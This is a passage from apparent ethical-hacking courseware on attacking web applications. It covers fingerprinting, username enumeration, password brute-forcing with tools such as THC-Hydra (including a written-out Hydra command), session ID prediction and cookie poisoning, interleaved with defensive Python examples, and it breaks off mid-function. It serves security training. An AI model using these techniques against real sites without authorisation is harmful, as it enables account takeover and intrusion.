1. Configure your web browser to use Burp as a local proxy
2. Access the entire target application, visiting every single link/URL possible, and submit all the application forms available
3. Browse the target application with JavaScript enabled and disabled, and with cookies enabled and disabled
4. Check the site map generated by the Burp proxy, and identify any hidden application content or functions
5. Continue these steps recursively until no further content or functionality is identified

FIGURE: Server Identification / Banner Grabbing (Burp Suite free edition screenshot showing the Intruder payload positions and attack results panes)
Web Spidering Using Mozenda Web Agent Builder

Mozenda Web Agent Builder crawls through a website and harvests pages of information.

Source: http://www.mozenda.com

Mozenda Web Agent Builder is a Windows application used to build your data extraction project. It crawls through a website and harvests pages of information. Web Agent Builder is a tool suite that includes an intuitive UI and a browser-based instruction set. Setting up your crawler is as simple as pointing and clicking to navigate pages and capture the information you want.
FIGURE: Web Spidering Using Mozenda Web Agent Builder (screenshot of the agent builder with its New Action, Selected Action and action list panes over a product review page)
Web App Hacking Methodology: Attack Web Servers

Once you conduct full-scope footprinting of the web infrastructure, analyze the gathered information to find the vulnerabilities that can be exploited to launch attacks on web servers. Then attempt to attack the web servers using the various techniques available. Each and every website or web application is associated with a web server that has code for serving the website or web application. The attacker exploits the vulnerabilities in that code and launches attacks on the web server. Detailed information about hacking web servers is given on the following slides.
Hacking Web Servers

Once the attacker identifies the web server environment, he or she scans for known vulnerabilities by using a web server vulnerability scanner. Vulnerability scanning helps the attacker to launch the attack easily by identifying the exploitable vulnerabilities present on the web server. Once the attacker gathers all the potential vulnerabilities, he or she tries to exploit them with the help of various attack techniques to compromise the web server. In order to stop the web server from serving legitimate users or clients, the attacker launches a DoS attack against the web server. You can launch attacks on a vulnerable web server with the help of tools such as UrlScan, Nikto, Nessus, Acunetix Web Vulnerability Scanner, WebInspect, etc.
Web Server Hacking Tool: WebInspect

- WebInspect identifies security vulnerabilities in web applications
- It runs interactive scans using a sophisticated user interface
- Attackers can exploit identified vulnerabilities to carry out web services attacks

Source: https://download.hpsmartupdate.com

WebInspect software is web application security assessment software designed to thoroughly analyze today's complex web applications. It delivers fast scanning capabilities, broad assessment coverage, and accurate web application scanning results. It identifies security vulnerabilities that are undetectable by traditional scanners. Attackers can exploit the identified vulnerabilities for launching web services attacks.

FIGURE: WebInspect Tool Screenshot
Web App Hacking Methodology: Analyze Web Applications

Analyzing the web application helps you identify the different vulnerable points that an attacker can exploit to compromise the web application. Detailed information about analyzing a web application and identifying the entry points to break into it is given on the following slides.
Analyze Web Applications

Analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes.

- Identify entry points for user input: review the generated HTTP requests to identify the input entry points
- Identify server-side functionality: observe the application's pages revealed to the client to identify the server-side structure and functionality
- Identify server-side technologies: fingerprint the technologies active on the server using various fingerprinting techniques such as HTTP fingerprinting
- Map the attack surface: identify the various attack surfaces uncovered by the application and the vulnerabilities associated with each one

Web applications have various vulnerabilities. First, the attacker has to acquire basic knowledge of the web application, and then analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes.

Identify Entry Points for User Input

The entry points of an application also serve as entry points for attacks; they include the front-end web application that listens for HTTP requests. Review the generated HTTP requests to identify the user input entry points.

Identify Server-side Functionality

Server-side functionality refers to the ability of a server to execute programs that produce web pages as output. These are scripts that reside on particular web servers and allow interactive web pages or websites to run there. Observe the application's pages revealed to the client to identify the server-side structure and functionality.

Identify Server-side Technologies

Server-side technologies, or server-side scripting, refer to the dynamic generation of the web pages served by the web servers, as opposed to static web pages that are held in the server's storage and served to web browsers as they are. Fingerprint the technologies active on the server using various fingerprinting techniques such as HTTP fingerprinting.

Map the Attack Surface

Identify the various attack surfaces uncovered by the application and the vulnerabilities that are associated with each one.
Analyze Web Applications: Identify Entry Points for User Input

During web application analysis, attackers identify entry points for user input so that they can understand the way the web application accepts or handles that input. The attacker then tries to find the vulnerabilities present in the input mechanism and tries to exploit them so as to gain access to the web application.

- Examine the URL, HTTP headers, query string parameters, POST data, and cookies to determine all user input fields.
- Identify HTTP header parameters that can be processed by the application as user input, such as the User-Agent, Referer, Accept, Accept-Language, and Host headers.
- Determine the URL encoding techniques and other encryption measures implemented to secure the web traffic, such as SSL.

The tools used to analyze web applications and identify entry points for user input include Burp Suite, httprint, WebScarab, OWASP Zed Attack Proxy, etc.
Analyze Web Applications: Identify Server-Side Technologies

Source: http://net-square.com

After identifying the entry points through user inputs, attackers try to identify the server-side technologies. The server-side technologies can be identified as follows:

1. Perform detailed server fingerprinting; analyze HTTP headers and HTML source code to identify server-side technologies
2. Examine URLs for file extensions, directories, and other identification information
3. Examine the error page messages
4. Examine session tokens:
   - JSESSIONID - Java
   - ASPSESSIONID - IIS server
   - ASP.NET_SessionId - ASP.NET
   - PHPSESSID - PHP

FIGURE: Identify Server-Side Technologies (a web server fingerprinting report listing, per host and port, the banner reported and the banner deduced, including a host announcing "Yes we are using ServerMask!" that is nevertheless deduced as Microsoft IIS; and an ASP.NET "Server Error in '/ReportServer' Application" page, "Could not find the permission set named 'ASP.Net'", whose Version Information line reveals the Microsoft .NET Framework and ASP.NET versions)
Analyze Web Applications: Identify Server-Side Functionality

Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications.

Tools used: GNU Wget (gnu.org), Teleport Pro (tenmax.com), BlackWidow

Once the server-side technologies are determined, identify the server-side functionality. This helps you find the potential vulnerabilities in server-side functionality. Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications.

Tools Used:

Wget

Source: http://www.gnu.org

GNU Wget is for retrieving files using HTTP, HTTPS, and FTP, the most widely used Internet protocols. It is a non-interactive command-line tool, so it can be called from scripts, cron jobs, terminals without X-Windows support, etc.

Teleport Pro

Source: http://www.tenmax.com

Teleport Pro is an all-purpose high-speed tool for getting data from the Internet. Launch up to ten simultaneous retrieval threads, access password-protected sites, filter files by size and type, and search for keywords. Capable of reading HTML 4.0, CSS 2.0, and DHTML, Teleport can find all files available on all websites by means of web spidering with server-side image map exploration, automatic dial-up connecting, Java applet support, variable exploration depths, project scheduling, and relinking abilities.

BlackWidow

Source:

BlackWidow scans a site and creates a complete profile of the site's structure, files, external links and even link errors. BlackWidow will download all file types such as pictures and images, audio and MP3, videos, documents, ZIP, programs, CSS, Macromedia Flash, .pdf, PHP, CGI, HTM to MIME types from any websites. Download video and save as many different video formats, such as YouTube, MySpace, Google, MKV, MPEG, AVI, DivX, XviD, MP4, 3GP, WMV, ASF, MOV, QT, VOB, etc. It can now be controlled programmatically using the built-in Script Interpreter.

Examine URL:

https://www.juggyboy.com/customers.aspx?name=existing%20clients&isActive=0&startDate=20%2F11%2F2010&endDate=20%2F05%2F2011&showBy=name

  https        -> SSL
  .aspx        -> ASPX platform
  showBy=name  -> database column

FIGURE: BlackWidow

If a page URL starts with https instead of http, then it is known as an SSL certified page. If a page contains an .aspx extension, chances are that the application is written using ASP.NET. If the query string has a parameter named showBy, then you can assume that the application is using a database and displays the data by that value.
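The banner grab earlier in this section, the session token list under "Identify Server-Side Technologies" and the URL examination just above all feed the same inference. The following added example (not part of the original module) applies those indicators to a constructed response and URL, returns the inferred technologies together with the disclosures an administrator would want to remove, and shows the usual mitigation of stripping the version from the Server header and dropping X-Powered-By. The Server version, Date and X-Powered-By values are constructed samples; the cookie and URL follow the module's examples.

```python
"""Server-side technology fingerprint from a response and a URL.

Added example, not from the original module.  Indicators (from the module):
Server header and session cookie names in the response; scheme, file
extension and query parameter names in the URL.  Header values below are
constructed samples.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Session cookie name prefixes and the platforms they indicate.
SESSION_COOKIES = {
    "JSESSIONID": "Java",
    "ASPSESSIONID": "IIS server",
    "ASP.NET_SESSIONID": "ASP.NET",
    "PHPSESSID": "PHP",
}
EXTENSIONS = {".aspx": "ASP.NET", ".asp": "classic ASP",
              ".jsp": "Java", ".php": "PHP"}
# Query parameters whose name suggests the value selects a database column.
DB_HINT_PARAMS = {"showby", "sortby", "orderby"}


def parse_response(raw):
    """Split a raw HTTP response into (status_line, [(name, value), ...]).
    Repeated headers such as Set-Cookie are all kept."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip(), value.strip()))
    return lines[0], headers


def fingerprint(raw_response, url):
    """Return (sorted technologies, list of disclosures to remediate)."""
    tech = set()
    disclosures = []
    _status, headers = parse_response(raw_response)
    for name, value in headers:
        lname = name.lower()
        if lname == "server":
            tech.add(value.split("/")[0])
            if "/" in value:
                disclosures.append(f"Server header reveals version: {value}")
        elif lname == "x-powered-by":
            tech.add(value.split("/")[0])
            disclosures.append(f"X-Powered-By header present: {value}")
        elif lname == "set-cookie":
            cookie = value.split("=", 1)[0].strip().upper()
            for prefix, platform in SESSION_COOKIES.items():
                if cookie.startswith(prefix):
                    tech.add(platform)
    parts = urlsplit(url)
    if parts.scheme == "https":
        tech.add("SSL")
    m = re.search(r"(\.[a-z]+)$", parts.path.lower())
    if m and m.group(1) in EXTENSIONS:
        tech.add(EXTENSIONS[m.group(1)])
    for param in parse_qs(parts.query):
        if param.lower() in DB_HINT_PARAMS:
            tech.add("database-backed")
            disclosures.append(f"query parameter '{param}' likely names a database column")
    return sorted(tech), disclosures


def strip_disclosures(headers):
    """Mitigation: drop X-Powered-By and the version part of Server."""
    out = []
    for name, value in headers:
        lname = name.lower()
        if lname == "x-powered-by":
            continue
        if lname == "server":
            value = value.split("/")[0]
        out.append((name, value))
    return out


# Constructed response modelled on the module's banner grab.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"          # version is a constructed sample
    "Date: Thu, 07 Jul 2011 10:08:16 GMT\r\n"
    "Content-Length: 1270\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: ASPSESSIONIDQCQTCQBQ=PBLPKEKBNDGK0FFIP0LHPLNE; path=/\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "Connection: Close\r\n\r\n"
)
SAMPLE_URL = ("https://www.juggyboy.com/customers.aspx?name=existing%20clients"
              "&isActive=0&startDate=20%2F11%2F2010&endDate=20%2F05%2F2011&showBy=name")

if __name__ == "__main__":
    print(fingerprint(SAMPLE_RESPONSE, SAMPLE_URL))
```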
Analyze Web Applications: Map the Attack Surface

There are various entry points for attackers to compromise the network, so proper analysis of the attack surface must be done. Mapping the attack surface includes thorough checking of the possible vulnerabilities before launching the attack. The following are the various factors through which an attacker collects information and plans the kind of attack to be launched.

Information                     Attack
Client-Side Validation          Injection Attack, Authentication Attack
Injection Attack                Privilege Escalation, Access Controls
Database Interaction            SQL Injection, Data Leakage
Cleartext Communication         Data Theft, Session Hijacking
File Upload and Download        Directory Traversal
Error Message                   Information Leakage
Display of User-Supplied Data   Cross-Site Scripting
Interaction                     Injection
Dynamic Redirects               Redirection, Header Injection
Application Codes               Buffer Overflows
Login                           Username Enumeration, Password Brute-Force
Third-Party Application         Known Vulnerabilities Exploitation
Session State                   Session Hijacking, Session Fixation
Web Server Software             Known Vulnerabilities Exploitation

FIGURE: Map the Attack Surface
Web App Hacking Methodology

Attack Web Servers
Attack Authentication Mechanism
Attack Session Management Mechanism
Attack Data Connectivity
Attack Web Services

Web App Hacking Methodology

In web applications, the authentication functionality has many design loopholes, such as bad passwords (short or blank, common dictionary words or names, passwords set the same as the user name, and those still set to default values). The attacker can exploit the vulnerabilities in the authentication mechanism to gain access to the web application or network. The various threats that exploit weaknesses in the authentication mechanism include network eavesdropping, brute force attacks, dictionary attacks, cookie replay attacks, credential theft, etc.
Attack Authentication Mechanism

Most of the authentication mechanisms used by web applications have design flaws. If an attacker can identify those design flaws, he or she can easily exploit them and gain unauthorized access. The design flaws include failing to check password strength, insecure transportation of credentials over the Internet, etc. Web applications usually authenticate their clients or users based on a combination of user name and password. Hence, the authentication mechanism attack involves identifying and exploiting user names and passwords.

User Name Enumeration

User names can be enumerated in two ways; one is verbose failure messages and the other is predictable user names.

Verbose Failure Messages

In a typical login system, the user is required to enter two pieces of information, that is, user name and password. In some cases, an application will ask for some more information. If the user tries to log in and fails, then it can be inferred that at least one of the pieces of information provided by the user is incorrect or inconsistent with the other information provided. If the application discloses which particular piece of information provided by the user was incorrect or inconsistent, it gives an attacker ground to exploit the application.
Example:
Account <username> not found
The password provided is incorrect
Account <username> has been locked out

Predictable User Names

Some applications automatically generate account user names according to some predictable sequence. This makes it very easy for an attacker who can discern the sequence to build a potentially exhaustive list of all valid user names.

Password Attacks

Passwords are cracked based on:
Password functionality exploits
Password guessing
Brute-force attacks

Session Attacks

The following are the types of session attacks employed by the attacker to attack the authentication mechanism:
Session prediction
Session brute-forcing
Session poisoning

Cookie Exploitation

The following are the types of cookie exploitation attacks:
Cookie poisoning
Cookie sniffing
Cookie replay
User Name Enumeration

If the login error states which part of the user name and password is not correct, guess the users of the application using the trial-and-error method.

Note: User name enumeration from verbose error messages will fail if the application implements an account lockout policy, i.e., locks the account after a certain number of failed login attempts.

User Name Enumeration

Source: https://wordpress.com

User name enumeration helps in guessing login IDs and passwords of users. If the login error states which part of the user name and password is not correct, guess the users of the application using the trial-and-error method. Look at the following picture, which shows enumerating user names from verbose failure messages:
[Figure: two WordPress.com login screenshots. Left: "ERROR: Invalid username" for the username rini.matthews, captioned "Username rini.matthews does not exist". Right: "ERROR: The password you entered for the username rinimatthews is incorrect", captioned "Username successfully enumerated to rinimatthews".]

FIGURE: User Name Enumeration

Note: User name enumeration from verbose error messages will fail if the application implements an account lockout policy, i.e., locks the account after a certain number of failed login attempts. Some applications automatically generate account user names based on a sequence (such as user101, user102, etc.), and attackers can determine the sequence and enumerate valid user names.
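The lockout note and the verbose-versus-generic messages above translate directly into code. The following is an added example (written for this edit, not part of the courseware and not WordPress.com's code): a login handler that leaks which field was wrong, next to one that returns a single generic message, does the same password-hashing work for unknown and known names, and locks the account after a threshold of failures. The user name is taken from the figure; the password, the threshold of five attempts and the PBKDF2 iteration count are assumptions.

```python
"""Verbose vs. uniform login failure messages, with an account lockout policy.

Added example (not from the CEH courseware). The user names, passwords and
the lockout threshold are constructed/assumed values.
"""
import hashlib
import hmac
import os
from dataclasses import dataclass

LOCKOUT_THRESHOLD = 5          # assumed policy: lock after 5 consecutive failures
PBKDF2_ROUNDS = 50_000         # kept low so the example runs quickly


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


@dataclass
class Account:
    salt: bytes
    pw_hash: bytes
    failed_attempts: int = 0
    locked: bool = False


def make_account(password: str) -> Account:
    salt = os.urandom(16)
    return Account(salt=salt, pw_hash=_hash_password(password, salt))


# Constructed sample user table (the name is taken from the figure above).
USERS = {"rinimatthews": make_account("correct horse battery staple")}

# Dummy account so the unknown-user path performs the same PBKDF2 work as the
# known-user path; otherwise response time would reveal which path ran.
_DUMMY = make_account("dummy")

GENERIC_FAILURE = "ERROR: Invalid username or password"


def login_verbose(username: str, password: str) -> str:
    """Vulnerable: the message tells the caller which field was wrong."""
    account = USERS.get(username)
    if account is None:
        return f"ERROR: Invalid username {username}"
    if not hmac.compare_digest(account.pw_hash, _hash_password(password, account.salt)):
        return f"ERROR: The password you entered for the username {username} is incorrect"
    return "OK"


def login_uniform(username: str, password: str) -> str:
    """Hardened: one failure message for every cause, plus lockout.

    A locked account also answers with GENERIC_FAILURE, because a distinct
    "account locked" message would itself confirm that the name exists.
    """
    account = USERS.get(username)
    candidate = account if account is not None else _DUMMY
    password_ok = hmac.compare_digest(
        candidate.pw_hash, _hash_password(password, candidate.salt)
    )
    if account is None or account.locked or not password_ok:
        if account is not None and not account.locked:
            account.failed_attempts += 1
            if account.failed_attempts >= LOCKOUT_THRESHOLD:
                account.locked = True
        return GENERIC_FAILURE
    account.failed_attempts = 0        # a successful login resets the counter
    return "OK"


def attempts_until_locked(username: str, wrong_password: str) -> int:
    """Count the wrong guesses needed before the policy locks the account."""
    attempts = 0
    while not USERS[username].locked:
        login_uniform(username, wrong_password)
        attempts += 1
    return attempts
```

Uniform messages alone are not enough: if the unknown-user path skipped the hash computation, response time would still tell the two cases apart, which is why the dummy account exists. A distinct "account locked" reply would reintroduce the enumeration oracle, so locked accounts receive the generic message as well.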
Password Attacks: Password Functionality Exploits

Determine password change functionality within the application by spidering the application or creating a login account.
Try random strings for 'Old Password', 'New Password', and 'Confirm the New Password' fields and analyze errors to identify vulnerabilities in password change functionality.
'Forgot Password' features generally present a challenge to the user; if the number of attempts is not limited, an attacker can guess the challenge answer successfully with the help of social engineering.
Applications may also send a unique recovery URL or existing password to an email address specified by the attacker if the challenge is solved.
"Remember Me" functions are implemented using a simple persistent cookie, such as Rememberuser=jason, or a persistent session identifier such as Rememberuser=aby.
Attackers can use an enumerated user name or predict the session identifier to bypass authentication mechanisms.

Password Attacks: Password Functionality Exploits

Password attacks are the techniques used by the attacker for discovering passwords. Attackers exploit the password functionality so that they can bypass the authentication mechanism.

Password Changing

Determine password change functionality within the application by spidering the application or creating a login account.
Try random strings for the Old Password, New Password, and Confirm the New Password fields and analyze errors to identify vulnerabilities in password change functionality.

Password Recovery

Forgot Password features generally present a challenge to the user; if the number of attempts is not limited, attackers can guess the challenge answer successfully with the help of social engineering. Applications may also send a unique recovery URL or existing password to an email address specified by the attacker if the challenge is solved.

Remember Me Exploit

Remember Me functions are implemented using a simple persistent cookie, such as Rememberuser=jason, or a persistent session identifier such as Rememberuser=ABY.
Attackers can use an enumerated user name or predict the session identifier to bypass authentication mechanisms.
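The three weaknesses just described (guessable Remember Me cookies, unlimited challenge attempts, and recovery links sent to an attacker-chosen address) each have a straightforward countermeasure. This added example (not the courseware's code) shows them together: opaque random remember-me tokens stored only as hashes and with an expiry, a recovery challenge capped at three guesses, and a reset link that is only ever delivered to the address on file. The lifetime, the attempt cap, the user name, the challenge answer and the e-mail addresses are assumed or constructed values.

```python
"""Hardened 'Remember Me' tokens and a rate-limited 'Forgot Password' challenge.

Added example, not from the courseware. Token lifetime, attempt limit, user
names, e-mail addresses and the challenge answer are assumed/constructed.
"""
import hashlib
import secrets
import time
from typing import Dict, Optional, Tuple

REMEMBER_ME_LIFETIME = 30 * 24 * 3600   # assumed: 30 days
RECOVERY_MAX_ATTEMPTS = 3               # assumed: three guesses per challenge


def _digest(value: str) -> str:
    return hashlib.sha256(value.encode()).hexdigest()


class RememberMeStore:
    """Opaque random tokens in place of 'Rememberuser=jason'.

    The cookie carries no user name and nothing guessable; the server keeps
    only a hash of each token, so a copied table does not yield usable cookies.
    """

    def __init__(self) -> None:
        self._tokens: Dict[str, Tuple[str, float]] = {}   # hash -> (user, expiry)

    def issue(self, username: str, now: Optional[float] = None) -> str:
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)                 # 256 bits of entropy
        self._tokens[_digest(token)] = (username, now + REMEMBER_ME_LIFETIME)
        return token

    def lookup(self, token: str, now: Optional[float] = None) -> Optional[str]:
        """Return the user bound to the token, or None if unknown or expired."""
        now = time.time() if now is None else now
        entry = self._tokens.get(_digest(token))
        if entry is None:
            return None
        username, expires_at = entry
        if now >= expires_at:
            self.revoke(token)
            return None
        return username

    def revoke(self, token: str) -> None:
        self._tokens.pop(_digest(token), None)


class RecoveryChallenge:
    """Secret-question step of password recovery with a hard attempt cap."""

    def __init__(self, username: str, answer: str, registered_email: str) -> None:
        self.username = username
        self.registered_email = registered_email
        self._answer_hash = _digest(answer.strip().lower())
        self.attempts_left = RECOVERY_MAX_ATTEMPTS
        self.solved = False

    def answer(self, guess: str) -> bool:
        """One guess; after RECOVERY_MAX_ATTEMPTS wrong guesses the challenge is dead."""
        if self.solved or self.attempts_left <= 0:
            return False
        self.attempts_left -= 1
        if secrets.compare_digest(self._answer_hash, _digest(guess.strip().lower())):
            self.solved = True
        return self.solved

    def recovery_link(self, requested_email: Optional[str] = None) -> Tuple[str, str]:
        """Deliver a single-use random link to the address on file only.

        requested_email is deliberately ignored: the weakness described above
        is sending the link to an address supplied in the request.
        """
        if not self.solved:
            raise PermissionError("challenge not solved")
        token = secrets.token_urlsafe(32)
        return self.registered_email, f"https://example.invalid/reset?token={token}"
```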
Password Attacks: Password Guessing

Password List: Attackers create a list of possible passwords using the most commonly used passwords, footprinting the target and social engineering techniques, and try each password until the correct password is discovered.
Password Dictionary: Attackers can create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks.
Tools: Password guessing can be performed manually or using automated tools such as Brutus, THC-Hydra, etc.

Password Attacks: Password Guessing

Password guessing is a method where an attacker guesses various passwords until he or she gets the correct password, using the following methods: password list, password dictionary, and various tools.
Password List

Attackers create a list of possible passwords using the most commonly used passwords, footprinting the target and social engineering techniques, and try each password until the correct password is discovered.

Password Dictionary

Attackers can create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks.

Tools Used for Password Guessing

Password guessing can be performed manually or using automated tools such as WebCracker, Brutus, Burp Insider, THC-Hydra, etc.

THC-Hydra

Source: http://www.thc.org
THC-Hydra is a network logon cracker that supports many different services. This tool is proof-of-concept code, written to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.

[Figure: Hydra GTK screenshot with the Target, Passwords, Tuning, Specific and Start tabs; username testuser, password list /tmp/passlist.txt, options "Try login as password" and "Try empty password"; the output pane shows Hydra (c) by van Hauser / THC, "use allowed only for legal purposes", attacking service ftp on port 21, and the generated command line hydra ftp -l testuser -P /tmp/passlist.txt -e ns.]

FIGURE: THC-Hydra Tool Screenshot

In addition to these tools, Burp Insider is also used for password guessing.
Password Attacks: Brute-forcing

Brute force is one of the methods used for cracking passwords. In a brute-forcing attack, attackers crack login passwords by trying all possible values from a set of alphabetic, numeric, and special characters. The main limitation of the brute force attack is that it is only beneficial in identifying small passwords of two characters. Guessing becomes harder when the password length is longer and also if it contains letters in both upper and lower case. If numbers and symbols are used, then it might even take more than a few years to guess the password, which is almost practically impossible. Commonly used password cracking tools by attackers include Burp Suite's Intruder, Brutus, Sensepost's Crowbar, etc.

Burp Suite's Intruder

Source: http://portswigger.net

Burp Intruder is a module of Burp Suite. It enables the user to automate pen testing on web applications.
[Figure: Burp Suite free edition, Intruder tab (target, positions, payloads, options); payload set 1 uses the "brute forcer" payload type with the character set abcdefghijklmnopqrstuvwxyz, a maximum length, and a payload processing rule "to uppercase".]

FIGURE: Burp Suite's Intruder Tool Screenshot

Brutus

Source: http://www.hoobie.net

Brutus is a remote password cracking tool. Brutus supports HTTP, POP3, FTP, SMB, Telnet, IMAP, NNTP, and many other authentication types. It includes a multi-stage authentication engine and can make 60 simultaneous target connections.

[Figure: "Brutus - AET2 - www.hoobie.net/brutus - (January)" window: target and connection options (Type: HTTP (Basic Auth), Port, Connections, Timeout, Use Proxy), HTTP (Basic) options (Method HEAD, KeepAlive), authentication options (Use Username, Pass Mode: Word List, User File users.txt, Pass File words.txt), and a Positive Authentication Results pane reporting a user file containing 6 users and a password file containing 818 passwords.]

FIGURE: Brutus Tool Screenshot
Session Attacks: Session ID Prediction / Brute Forcing

Every time a user logs in to a particular website, a session ID is given to the user. This session ID is valid until the session is terminated, and a new session ID is provided when the user logs in again. Attackers try to exploit this session ID mechanism by guessing the next session ID after collecting some valid session IDs.

In the first step, the attacker collects some valid session ID values by sniffing traffic from authenticated users. Attackers then analyze the captured session IDs to determine the session ID generation process, such as the structure of the session ID, the information that is used to create it, and the encryption or hash algorithm used by the application to protect it. In addition, the attacker can implement a brute force technique to generate and test different values of the session ID until he or she successfully gets access to the application.
Vulnerable session generation mechanisms that use session IDs composed from the user name or other predictable information, like a timestamp or the client IP address, can be exploited by easily guessing valid session IDs.

[Figure: captured HTTP request. GET ...?menu=410 HTTP/1.1; Host: janaina:...; User-Agent: Mozilla/5.0 (Window; U; Windows NT 5.2; en-US; rv:...) Gecko/... Firefox/...; Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5; Referer: http://janaina:.../WebGoat/attack?Screen=17&menu=...; Cookie: JSESSIONID=user01 (marked "Predictable Session Cookie"); Authorization: Basic ...]

FIGURE: Session ID Prediction / Brute Forcing

For certain web applications, the session ID information is usually composed of a string of fixed width. Randomness is essential in order to avoid prediction. From the diagram you can see that the session ID variable is indicated by JSESSIONID and that its value is "user01," which corresponds to the user name. By guessing a new value for it, say "user02," it is possible for the attacker to gain unauthorized access to the application.
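Since the text above says that randomness is what prevents prediction, a reviewer wants a quick way to judge a sample of captured IDs. The following added example (not from the courseware) applies three simple heuristics to a list of session IDs: common-prefix length, a sequential numeric suffix (the user01/user02 case and a counter or timestamp suffix), and per-character Shannon entropy; it then compares a constructed "user01" sample with IDs from a sound generator. The sample IDs are constructed and the thresholds are assumptions to be tuned per application.

```python
"""Heuristic check of sampled session IDs for predictable structure.

Added example, not from the courseware. The samples are constructed (the first
mirrors the JSESSIONID=user01 cookie in the figure); thresholds are assumptions.
"""
import math
import re
import secrets
from collections import Counter
from typing import Dict, List

MIN_ENTROPY_BITS_PER_CHAR = 3.0   # assumed threshold; random hex scores close to 4


def shannon_entropy_bits(samples: List[str]) -> float:
    """Per-character Shannon entropy over all characters in the sample."""
    counts = Counter("".join(samples))
    total = sum(counts.values())
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def common_prefix(samples: List[str]) -> str:
    """Longest prefix shared by every sampled ID."""
    prefix = samples[0]
    for s in samples[1:]:
        while not s.startswith(prefix):
            prefix = prefix[:-1]
    return prefix


def numeric_suffix_is_sequential(samples: List[str]) -> bool:
    """True when every ID ends in a number and, in capture order, the numbers
    form an arithmetic progression with a positive step (user01, user02, ...
    or a counter/timestamp suffix)."""
    numbers = []
    for s in samples:
        match = re.search(r"(\d+)$", s)
        if match is None:
            return False
        numbers.append(int(match.group(1)))
    steps = {b - a for a, b in zip(numbers, numbers[1:])}
    return len(steps) == 1 and steps.pop() > 0


def assess(samples: List[str]) -> Dict[str, object]:
    """Summarise the sample; 'predictable' is True when any heuristic fires."""
    if len(samples) < 2:
        raise ValueError("need at least two captured IDs")
    prefix = common_prefix(samples)
    entropy = shannon_entropy_bits(samples)
    sequential = numeric_suffix_is_sequential(samples)
    findings = {
        "fixed_width": len({len(s) for s in samples}) == 1,
        "common_prefix": prefix,
        "sequential_suffix": sequential,
        "entropy_bits_per_char": round(entropy, 2),
    }
    findings["predictable"] = (
        sequential
        or len(prefix) >= len(samples[0]) // 2        # half the ID never changes
        or entropy < MIN_ENTROPY_BITS_PER_CHAR
    )
    return findings


# Constructed samples: the figure's user-name scheme and a timestamp scheme.
PREDICTABLE_IDS = ["user01", "user02", "user03", "user04"]
TIMESTAMP_IDS = ["sess-1349000100", "sess-1349000160", "sess-1349000220"]


def random_ids(n: int = 4) -> List[str]:
    """What a sound generator produces: 128 random bits per ID."""
    return [secrets.token_hex(16) for _ in range(n)]
```

These heuristics flag the obvious schemes; they do not prove an ID space is unpredictable, which needs a large sample and a proper randomness assessment of the generator itself.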
Cookie Exploitation: Cookie Poisoning

If the cookie contains passwords or session identifiers, attackers can steal the cookie using techniques such as script injection and eavesdropping.
Attackers then replay the cookie with the same or altered passwords or session identifiers to bypass web application authentication.
Attackers can trap cookies using tools such as OWASP Zed Attack Proxy, Burp Suite, etc.

Cookie Exploitation: Cookie Poisoning

Cookies frequently transmit sensitive credentials and can be modified with ease to escalate access or assume the identity of another user. Cookies are used to maintain a session state in the otherwise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the web application.
Poisoning of cookies and session information can allow an attacker to inject malicious content or otherwise modify the user's online experience and obtain unauthorized information. Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. Cookies exist as files stored in the client computer's memory or hard disk. By modifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session.

Many sites offer the ability to "Remember me?" and store the user's information in a cookie, so he or she does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. In an attempt to protect cookies, site developers often encode the cookies. Easily reversible encoding methods such as Base64 and ROT13 (rotating the letters of the alphabet 13 characters) give many who view cookies a false sense of security. If the cookie contains passwords or session identifiers, attackers can steal the cookie using techniques such as script injection and eavesdropping. Attackers then replay the cookie with the same or altered
passwords or session identifiers to bypass web application authentication. Examples of tools used by the attacker for trapping cookies include OWASP Zed Attack Proxy, Burp Suite, etc.

OWASP Zed Attack Proxy

Source: https://www.owasp.org

OWASP Zed Attack Proxy Project (ZAP) is an integrated penetration testing tool for testing web applications. It provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

[Figure: OWASP ZAP "Untitled Session" window showing the Sites tree and the Request/Response/Break tabs with an intercepted request to tr.adinterax.com (User-Agent, Cache-Control, Accept, Referer: http://in.yahoo.com/?p=us, Accept-Encoding, Accept-Language, Accept-Charset, Cookie and Host headers), plus the History, Search, Break Points, Alerts, Active Scan, Spider, Brute Force, Port Scan, Fuzzer, Params and Output tabs.]

Figure: OWASP Zed Attack Proxy Tool Screenshot
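The paragraph above notes that Base64 or ROT13 encoding gives a false sense of security. This added example (not the courseware's code) makes the difference concrete: a Base64-only cookie can be decoded, edited and re-encoded, while a cookie carrying an HMAC-SHA256 tag computed under a server-side key fails verification after the same edit. The key and the uid/role payload are constructed.

```python
"""Encoding is not integrity protection: Base64 cookie vs. HMAC-signed cookie.

Added example, not from the courseware. The key and the cookie payload are
constructed; a real application loads the key from a secrets store.
"""
import base64
import hashlib
import hmac
import secrets
from typing import Optional

SERVER_KEY = secrets.token_bytes(32)          # assumed: per-deployment secret


def encode_cookie_insecure(payload: str) -> str:
    """'Protection' by Base64 only; anyone can decode, edit and re-encode it."""
    return base64.urlsafe_b64encode(payload.encode()).decode()


def decode_cookie_insecure(cookie: str) -> str:
    return base64.urlsafe_b64decode(cookie.encode()).decode()


def sign_cookie(payload: str, key: bytes = SERVER_KEY) -> str:
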